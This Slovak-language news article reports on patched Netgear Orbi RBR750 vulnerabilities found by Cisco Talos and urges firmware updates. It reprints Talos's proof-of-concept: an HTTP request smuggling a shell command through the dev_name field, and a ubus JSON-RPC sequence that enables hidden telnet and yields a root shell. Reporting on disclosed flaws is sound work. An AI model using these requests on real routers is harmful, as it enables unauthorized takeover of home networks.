Netgear
Ak sa na pripojenie k internetu spoliehate na sieťový bezdrôtový systém Orbi od spoločnosti Netgear, mali by ste sa uistiť, že teraz beží najnovší firmvér, keď bol vydaný exploit kód pre kritické zraniteľnosti v starších verziách verzií.
Bezdrôtový systém Netgear Orbi sa skladá z hlavného rozbočovača a jedného alebo viacerých satelitných smerovačov, ktoré rozširujú dosah siete. Nastavením viacerých prístupových bodov v domácnosti alebo kancelárii tvoria sieťový systém, ktorý zaisťuje dostupné pokrytie Wi-Fi.
Vzdialené vstrekovanie ľubovoľných príkazov
Minulý rok výskumníci bezpečnostného tímu Talos spoločnosti Cisco objavili štyri zraniteľné miesta a súkromne ich nahlásili spoločnosti Netgear. Najzávažnejšia zo zraniteľností, sledovaná ako CVE-2022-37337, spočíva vo funkcii riadenia prístupu RBR750. Hackeri ho môžu zneužiť na vzdialené vykonávanie príkazov odosielaním špeciálne vytvorených požiadaviek HTTP do zariadenia. Hacker sa musí najprv pripojiť k zariadeniu, a to buď tak, že pozná heslo SSID, alebo pristúpi k nechránenému SSID. Závažnosť chyby je hodnotená 9,1 z 10 možných.
V januári spoločnosť Netgear vydala aktualizácie firmvéru, ktoré opravili túto chybu zabezpečenia. Teraz Talos publikovaný proof-of-concept exploit code spolu s technickými detailmi.
„Funkcia riadenia prístupu Orbi RBR750 umožňuje používateľovi explicitne pridávať zariadenia (špecifikované MAC adresou a názov hostiteľa), aby ste povolili alebo zablokovali špecifikované zariadenie pri pokuse o prístup k sieti,“ napísali vedci z Talos. "Parameter dev_name je však zraniteľný voči vstrekovaniu príkazov."
Vydaný exploit kód je:
POST /access_control_add.cgi? id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1. Host: 10.0.0.1. Content-Length: 104. Authorization: Basic YWRtaW46UGFzc3cwcmQ=
Content-Type: application/x-www-form-urlencoded. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36. Accept: text/html, application/xhtml+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/*;q=0.8,application/signed-exchange; v=b3;q=0.9. Accept-Encoding: gzip, deflate. Accept-Language: en-US, en; q=0.9. Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866. Connection: closeaction=Apply&mac_addr=aabbccddeeaa&dev_name=test; ping${IFS}10.0.0.4&access_control_add_type=blocked_list. Zariadenie bude reagovať nasledovne:
root@RBR750:/tmp# ps | grep ping 21763 root 1336 S ping 10.0.0.4. Dve ďalšie zraniteľnosti, ktoré Talos objavil, tiež dostali záplaty v januári. CVE-2022-36429 je tiež chyba pri vykonávaní vzdialeného príkazu, ktorú možno zneužiť odoslaním sekvencie škodlivých paketov, ktoré vytvoria špeciálne vytvorený objekt JSON. Jeho stupeň závažnosti je 7,2.
Využitie začína použitím súčtu SHA256 hesla s používateľským menom „admin“ na vrátenie overovacieho súboru cookie potrebného na spustenie nezdokumentovanej relácie telnetu:
POST /ubus HTTP/1.1. Host: 10.0.0.4. Content-Length: 217. Accept: application/json. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36. Content-Type: application/json. Origin: http://10.0.0.4. Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate. Accept-Language: en-US, en; q=0.9. Connection: close{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"","timeout":900}],"jsonrpc":"2.0","id":3}
Potom sa zobrazí token „ubus_rpc_session“ potrebný na spustenie skrytej služby telnet:
HTTP/1.1 200 OK. Content-Type: application/json. Content-Length: 829. Connection: close. Date: Mon, 11 Jul 2022 19:27:03 GMT. Server: lighttpd/1.4.45{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
Protivník potom pridá parameter s názvom „telnet_enable“ na spustenie služby telnet:
POST /ubus HTTP/1.1. Host: 10.0.0.4. Content-Length: 138. Accept: application/json. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36. Content-Type: application/json. Origin: http://10.0.0.4. Referer: http://10.0.0.4/status.html. Accept-Encoding: gzip, deflate. Accept-Language: en-US, en; q=0.9. Connection: close{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
Rovnaké heslo použité na vygenerovanie hashu SHA256 s používateľským menom „admin“ potom umožní útočníkovi prihlásiť sa do služby:
$ telnet 10.0.0.4. Trying 10.0.0.4... Connected to 10.0.0.4. Escape character is '^]'.login: admin. Password: IMPORTANT Use 'passwd' to set your login password this will disable telnet and enable SSH. BusyBox v1.30.1 () built-in shell (ash) MM NM MMMMMMM M M $MMMMM MMMMM MMMMMMMMMMM MMM MMM MMMMMMMM MM MMMMM. MMMMM: MMMMMM: MMMM MMMMM. MMMM= MMMMMM MMM MMMM MMMMM MMMM MMMMMM MMMM MMMMM'
MMMM= MMMMM MMMM MM MMMMM MMMM MMMM MMMMNMMMMM. MMMM= MMMM MMMMM MMMMM MMMM MMMM MMMMMMMM. MMMM= MMMM MMMMMM MMMMM MMMM MMMM MMMMMMMMM. MMMM= MMMM MMMMM, NMMMMMMMM MMMM MMMM MMMMMMMMMMM. MMMM= MMMM MMMMMM MMMMMMMM MMMM MMMM MMMM MMMMMM. MMMM= MMMM MM MMMM MMMM MMMM MMMM MMMM MMMM. MMMM$ ,MMMMM MMMMM MMMM MMM MMMM MMMMM MMMM MMMM MMMMMMM: MMMMMMM M MMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMN M MMMMMMMMM MMMM MMMM MMMM M MMMMMMM M M M For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254) root@RBS750:/#
Ďalšou opravenou zraniteľnosťou je CVE-2022-38458, s hodnotením závažnosti 6,5. Vychádza zo zariadenia, ktoré používateľov vyzýva na zadanie hesla cez pripojenie HTTP, ktoré nie je šifrované. Protivník v tej istej sieti potom môže vyňuchať heslo.
